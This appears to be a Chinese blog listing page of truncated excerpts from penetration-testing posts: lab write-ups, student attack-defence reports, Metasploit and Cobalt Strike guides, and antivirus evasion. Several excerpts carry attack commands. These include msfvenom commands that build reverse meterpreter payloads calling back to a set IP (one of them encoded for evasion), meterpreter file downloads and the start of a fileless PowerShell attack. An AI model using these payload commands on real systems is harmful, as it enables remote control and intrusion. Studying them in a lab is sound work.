- 2024-11-08打靶记录-Jarbas
靶机下载vulnhub->Jarbas确定靶机nmap-sn192.168.52.0/24靶机ip:192.168.52.130扫描全端口开放情况nmap-sT192.168.52.130-p--oA./ports详细扫开放的端口nmap-sT-sC-sV-O192.168.52.130-p22,80,3306,8080-oA./details扫udp端口开放nmap-sU--top-po
- 2024-10-28红日安全-ATT& CK实战:Vulnstack靶场实战
安全提示:该篇内容仅可用于学习任务要求环境配置下载靶场;网卡配置;检测联通性;开启web服务。信息收集使用Nmap扫描;使用kaliLinux访问目标80端口;使用御剑后台扫描工具扫描。漏洞利用yxcms漏洞(信息泄露+后台弱密码);phpadmin弱口令漏洞;yxcms的留言板存在存储型xss漏洞;yxcms
- 2024-10-24构建之法
第六章、敏捷流程1.Scrum方法论是敏捷过程的一种,敏捷过程的精髓在于快速交付。1)第一步:找出完成产品需要做的事情-ProductBacklog。Backlog意为待解决的工作。2)第二步:决定当前的冲刺需求决定的事情-SprintBacklog。3)第三步:冲刺(Sprint)。在冲刺阶段,外部人士不能直接
- 2024-10-2120222425 2024-2025-1《网络与系统攻防技术》 实验二实验报告
目录1.实验内容2.实验问题3.实验过程3.1windows下使用netcat获取kali的Shell,用cron命令启动某项任务3.1.1使用netcat获取kali的shell3.1.2用cron命令启动某项任务3.2kali下使用socat获取windows的Shell,用schtasks命令创建并启动某项任务计划3.2.1实验准备3.2.2
- 2024-10-1920222403 2024-2025-1 《网络与系统攻防技术》实验二实验报告
|1.实验内容1.1实践目标(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)(2)使用socat获取主机操作Shell,任务计划启动(3)使用MSFmeterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(4)使用MSFmeterpreter(或其他软件)生成获取目标
- 2024-10-1820222427 2024-2025-1 《网络与系统攻防技术》实验二实验报告
1.实验内容1.1本周学习内容更加深入地学习了缓冲区溢出的相关知识。学习了关于ncat,socat等工具的原理,并尝试使用。初步学习了关于后门的基础知识。1.2实践目标(1)使用netcat获取主机操作Shell,cron启动某项任务(任务自定)PS:cron是linux下用来周期性的执行某种任务或
- 2024-10-17【工具使用】MSF使用_MSF中kiwi(mimikatz)模块
一、简介:kiwi模块:mimikatz模块已经合并为kiwi模块;使用kiwi模块需要system权限,所以我们在使用该模块之前需要将当前MSF中的shell提升为system。二、前提:1.提权到system权限当前权限是administrator用户若不是,需要利用其他手段先提权到administrator用户。然后adminis
- 2024-10-12Armitage:MSF图形界面神器
原创自然嗨嗨嗨安全免责声明请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。ArmitageArmitage是一款Java写的Metasploit图形界面化的攻击软件,可以用它结合Metasploit中已知的exploit来针对主机存在的漏洞自动化攻击。通过命令行的方式
- 2024-09-18Metasploit Framework (MSF) 使用指南 - 第一篇:介绍与基础用法
引言MetasploitFramework(MSF)是一款功能强大的开源安全漏洞检测工具,被广泛应用于渗透测试中。它内置了数千个已知的软件漏洞,并持续更新以应对新兴的安全威胁。MSF不仅限于漏洞利用,还包括信息收集、漏洞探测和后渗透攻击等多个环节,因此被安全社区誉为“可以黑掉整个宇宙”的工具。
- 2024-09-18【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS
前言博客主页:h0ack1r丶羽~从0到1~渗透测试中,如果攻击者使用各类上层隧道(例如:HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,本文主要讲解了【靶机能上TCP和不能上TCP的
- 2024-09-08【待做】【MSF系列】合集
MSF流量加密MSF木马java源码分析MSF|python木马源码免杀
- 2024-09-07Kali 安装炫彩蛇(MSF图形化工具)
本教程使用手动安装的形式。参考文献:首次安装(yuque.com) 准备安装文件这里在KaliLinux系统进行安装。切换到root用户。 将install.sh添加到虚拟机的某个目录(我直接上传到家目录里面了),脚本从raw.githubusercontent.com/docker/docker-install/master/install.sh下载
- 2024-09-05ATT&CK红队评估(红日靶场1)
前言博主小白一个,各位大佬勿喷,前前后后,学了挺久的,学了之后又忘了,因此来打红日靶场1巩固知识。文章写的不是很好,缺少很多细节,博主也是内网小白,很多都不懂,互相学习靶机介绍本靶机环境是红日团队开源的一个红队实战测试环境,靶机下载地址如下:http://vulnstack.qiy
- 2024-08-28【MSF系列】使用meterpreter从linux系统下载文件到kali
成功拿到了shell,在/var/www/html/cacti底下有个sql文件,将其下载下来命令download/path/to/file.txt/opt/downloads/file.txt下载后导入本地,可以获得登录密码+----+----------+----------------------------------+-------+---------------+---------------+--------------
- 2024-08-11【MSF系列】命令合集
###生成payloadmsfvenom-pwindows/meterpreter/reverse_winhttpsLHOST=39.97.167.211LPORT=6667--platformwindows-ax86HandLerSSLCert=./my.pemStagerVerifySSLCert=true-s42--smallest-ex86/shikata_ga_nai-i9-fraw|msfvenom--platformwindows-ax86
- 2024-08-10MSF及Windows渗透测试
一、MetasploitFramework原理Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合
- 2024-08-09【kali系列】Metasploit Framework (MSF) 从基础到进阶使用指南
引言一、MetasploitFramework介绍1.1MSF概述1.2MSF主要组件二、MetasploitFramework基础安装与配置2.1KaliLinux中的MSF2.2非KaliLinux环境下的安装2.3更新与升级三、MetasploitFramework基础用法3.1启动MSF控制台
- 2024-07-19【攻防技术系列+PowerShell】无文件落地攻击
#红队#MSF#powershell虚拟机环境搭建:【Kali】,192.168.10.131【win7】,192.168.10.134接上文:【攻防技术系列】MSF进程迁移,用的是里面的1.exe。如果遇到端口占用情况,可以采用以下解决方案:之后在【win7】中使用powershell执行以下命令,实现无文件落地攻击powershell-nop
- 2024-07-16【攻防技术系列】MSF进程迁移
#Msfvenom#进程迁移#pid虚拟机环境搭建【Kali】,192.168.10.131【win7】,192.168.10.134一、MSF进程迁移1.1手动迁移migratepid或者migrate-N应用名字[推荐:explorer.exe]1.2自动迁移setautorunscriptmigrate-nexplorer.exe或者使用默认迁移的setautor
- 2024-07-05CobaltStrike的内网安全
1.上线机器的Beacon的常用命令2.信息收集和网站克隆3.钓鱼邮件4.CS传递会话到MSF5.MSF会话传递到CS1上线机器的Beacon的常用命令介绍:CobaltStrike分为服务端和客户端,一般我们将服务端放在kali,客户端可以在物理机上面,或者虚拟机都可以启动服务端,首先创建一个监听(注意,这
- 2024-06-14MSF渗透使用说明
实验环境前提:对方的445端口必须开放,首先要保证是能够访问到目标机器的,那么我们先ping一下目标机器,看网络是否连通如果无法ping的话,对方机器必须要关闭防火墙,或许有其他方法在对方开启防火墙的情况下访问到对方?目前采用关闭防火墙使用工具:kali
- 2024-06-13红日复现为什么失败之struct漏洞复现
struts2漏洞一、指纹识别s2的url路径组成(详见struts.xml配置文件):name工程名+namespace命名空间+atcion名称+extends拓展名部署在根目录下,工程名可为空;当然namespace名称也可设置为空;拓展名也可设置为空。方法一(1)url会有.action或.do后缀文件名(eg:http://192.168.xx.xx/integ
- 2024-06-08记一次msf反弹shell小错误
使用MSF生成后门程序,反弹shell设置攻击机IP和端口,生成后门程序sudomsfvenom-pwindows/meterpreter/reverse_tcplhost=172.24.4.7lport=4444-fexe-oattack.exe设置监听模块打开msfconsole使用以下命令设置监听模块msfconsoleuseexploit/multi/handlerset
- 2024-06-06如何用Golang写msf插件模块
最近有空在看msf,发现msf里面有模块的源码是golang的,去翻了翻wiki,wiki上面的编写日期是2018.12.13,搜了下国内,好像没有这方面的文章,那就自己跟着做做记个笔记首先第一步自然是安装go,官方wiki上测试是在1.11.2通过,建议使用version>=1.11.2的go,怎么安装go我不再赘述注意事项
- 2024-06-03远控免杀篇
0x00:前言随着近两年hvv和红蓝对抗以及国家对于网络安全的重视,国内防护水平都蹭蹭上了一个台阶,不管是内部人员的技术水平提高还是防护设备的层层部署,均给了红队人员想要进一步行动设置了障碍。 通过weblogic的cve-2019-2725获取了一个,想要进一步把shell迁移到msf或者CS进行